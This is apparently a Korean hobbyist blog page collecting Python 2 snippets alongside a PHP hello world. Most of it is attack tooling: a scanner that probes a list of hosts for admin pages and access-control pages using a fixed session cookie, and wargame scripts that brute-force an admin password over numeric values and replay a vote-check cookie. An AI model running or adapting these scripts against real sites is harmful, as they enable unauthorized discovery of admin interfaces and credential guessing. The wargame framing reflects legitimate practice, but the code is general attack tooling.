暗行御史

<HTML>
<HEAD>
<TITLE> Hello World in PHP </TITLE>
</HEAD>
<BODY>
<?
// Hello world in PHP
 print("Hello World");
?>
</BODY>
</HTML>

미친 존재감..헬로 월드 -0-;

#http://docs.python.org/howto/regex.html
#해당 서비스 URL을 긁어와야 하는데 넘 귀찮아 우리 파썬이를 이용해봤다.
#매우 단순~ 코드.. 하지만 모르면 어렵다는거 =ㅅ=;
import re, time
import httplib, string

print "====================="
f=open("url.html",'r')
line=f.readline()
print "Scan URL! ==========="
for line in f:
 ad = re.findall('http.*?\'',line)
 if ad:
  print "Success is  %s" %ad
  e = open("Url_list.txt", 'a')
  data = str(ad) + '\n'
  e.write(data)
  e.close()
 else:
  print "URL is not found"
# time.sleep(0.5)

# 3시간만에 삽질과 오류잡고.. 성공 -ㅅ-;
# 일반적으로 진단 스캐너 보다 직접 구현하는게 더 정밀하고 안전하다.
# 하지만 귀찮고 시간이 걸린다는게.. 현실 +ㅁ+
import re, time
import httplib, string

print "====================="
f=open("url.txt",'r')
line=f.readline()
params = ''
print "Scan Type [원하는 디렉토리]"
for line in f:
                headers = {"Accept-Encoding": "gzip, deflate","Cookie": "PHPSESSID=e22d82112ba35e1d8f1f2f5d03b345ee"}
                url1 = string.replace(line, '\n', '')
                try:
                                conn = httplib.HTTPConnection("%s:80" %url1)
                                conn.request("GET", "/원하는 디렉토리/",params,headers)
                                response = conn.getresponse()
                                data = response.read()
                                data2 = response.status
                                data3 = url1 + ' ' + str(data2) + ' ' + "Success" + '\n'
                                data4 = url1 + '\n'
                                ad = re.findall("관리자페이지", data)
                                if ad:
                                                print "Success is  %s" %url1
                                                e = open("Type1_Success_main.txt", 'a')
                                                e.write(data3)
                                                e.close()
                                else:
                                                print "Error is %s" %url1
                                                s = open("Error.txt", 'a')
                                                s.write(data4)
                                                s.close()
                               
                except Exception, E:
                        print "Status: 500 Unexpected Error"
                        print "Content-Type: text/plain"
                        print "url: ", url1
                        print "Some unexpected error occurred. Error text was:", E
                       
#                time.sleep(2)
                conn.close()

f2=open("Error.txt",'r')
print "====================="
print "Scan Type 2[원하는 디렉토리2]"
line2=f2.readline()
params2 = ''
for line2 in f2:
                headers = {"Accept-Encoding": "gzip, deflate","Cookie": "PHPSESSID=e22d82112ba35e1d8f1f2f5d03b345ee"}
                url3 = string.replace(line2, '\n', '')
                try:
                        conn2 = httplib.HTTPConnection("%s:80" %url3)
                        conn2.request("GET", "/원하는 디렉토리2/",params2,headers)
                        response2 = conn2.getresponse()
                        data10 = response2.read()
                        data12 = response2.status
                        data13 = url3 + ' ' + str(data12) + ' ' + "Success" + '\n'
                        data14 = url3 + ' ' + str(data12) + ' ' + "Error" + '\n'
                        ad = re.findall("접근권한", data10)
                        if ad:
                                print "Success is  %s" %url3
                                e = open("Type2_Success_mainbody.txt", 'a')
                                e.write(data13)
                                e.close()
                        else:
                                print "Error is %s" %url3
                                s = open("Error2.txt", 'a')
                                s.write(data14)
                                s.close()
                except Exception, E:
                        print "Status: 500 Unexpected Error"
                        print "Content-Type: text/plain"
                        print "url: ", url1
                        print "Some unexpected error occurred. Error text was:", E
#                time.sleep(2)
                conn2.close()

워 게임 풀때 사용했던 방법.

import re
import httplib, urllib

params = ''
for i in range(2000,3000):
 headers = {"Content-type": "application/x-www-form-urlencoded","Cookie": "PHPSESSID=11fb82672162216b51cc705b5b122ca3"}
 conn = httplib.HTTPConnection("대상사이트.kr:80")
 conn.request("GET", "/대상URL/index.php?cid=admin&cpw=%s" %i,params,headers)
 response = conn.getresponse()
 data = response.read()
 ad = re.findall("admin</b>", data)
 if ad:
  print "The Password is %d" %i
  break
  print data
 print i
 conn.close()


==============================================================================

import re,time
import httplib, urllib

params = ''
for i in range(0,1):
 headers = {"Content-type": "application/x-www-form-urlencoded","Cookie": "PHPSESSID=f1b76b27c014a6216d06141d7f0ce50a; vote_check=ok; notice="}
 conn = httplib.HTTPConnection("대상사이트.kr:80")
 conn.request("GET", "/challenge/codeing/code5.html?hit=bitfox",params,headers)
 response = conn.getresponse()
 data = response.read()
 print data
 time.sleep(1)
 conn.close()

==============================================================================

2000에서 3000번 사이 패스워드 맞추기

import re
import urllib
 
for i in range(2000,3000):
    fw = urllib.urlopen("http://대상URL/index.php?cid=admin&cpw=%s" %i)
    read = fw.read()
    admin = re.findall("환영합니다",read)
    if admin:
         print "The Password is %d" %i
         break
    print i